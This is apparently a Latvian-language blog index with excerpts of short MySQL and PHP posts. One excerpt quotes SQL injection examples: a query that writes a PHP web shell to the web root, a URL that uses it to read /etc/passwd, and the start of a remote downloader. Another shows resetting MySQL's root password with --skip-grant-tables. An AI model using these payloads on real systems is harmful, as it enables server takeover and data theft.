SQL injection Knowledge Base

Pilnīgākais resurss, kuru esmu redzējis saistība ar SQL injekcijām. http://websec.ca/kb/sql_injection Tiem, kam interesē cik vienkārši var izmantojot kļūdaini uzrakstītas komandas un sql augšpielādes shell skatās piemēru šeit: http://websec.ca/kb/sql_injection#MySQL_Writing_Files Examples: To write a PHP shell: SELECT ‘<? system($_GET[\’c\’]); ?>’ INTO OUTFILE ‘/var/www/shell.php’;   and then access it at: http://localhost/shell.php?c=cat%20/etc/passwd To write a downloader: SELECT ‘<? fwrite(fopen($_GET[f], \’w\’), file_get_contents($_GET[u])); ...

Reset MySQL password

Bija nepieciešams pieslēgties MySql serverim, kuram nezināju root paroli. Izrādās, ka to izdarīt ir vienkāršāk par vienkāršu- vajag tikai apstādināt servisu, pēc tam to palaist noteiktā režīmā un nomainīt root paroli. //apstādinām sudo /etc/init.d/mysql stop vai sudo service mysql stop //palaižam sudo mysqld –skip-grant-tables //piesledzamies kā root mysql -u root mysql //nomainām paroli UPDATE user ...

Izraksts no PHP un MySql

Dažas pamat lietas no php.net, lai katru reizi nav jāmeklē kā pārbaudīt vai tabulā ir meklējamie ieraksti.

Izvadīt no datubāzes rindiņas, lai katru reizi būtu savādākā secībā

Savajadzējās, lai uztaisītu vienu darbiņu: Ideāls risinājums ar MySql(testēju uz 5 MySql uz citiem var neiet): select * tabulas_nosaukums order by rand(); Tweet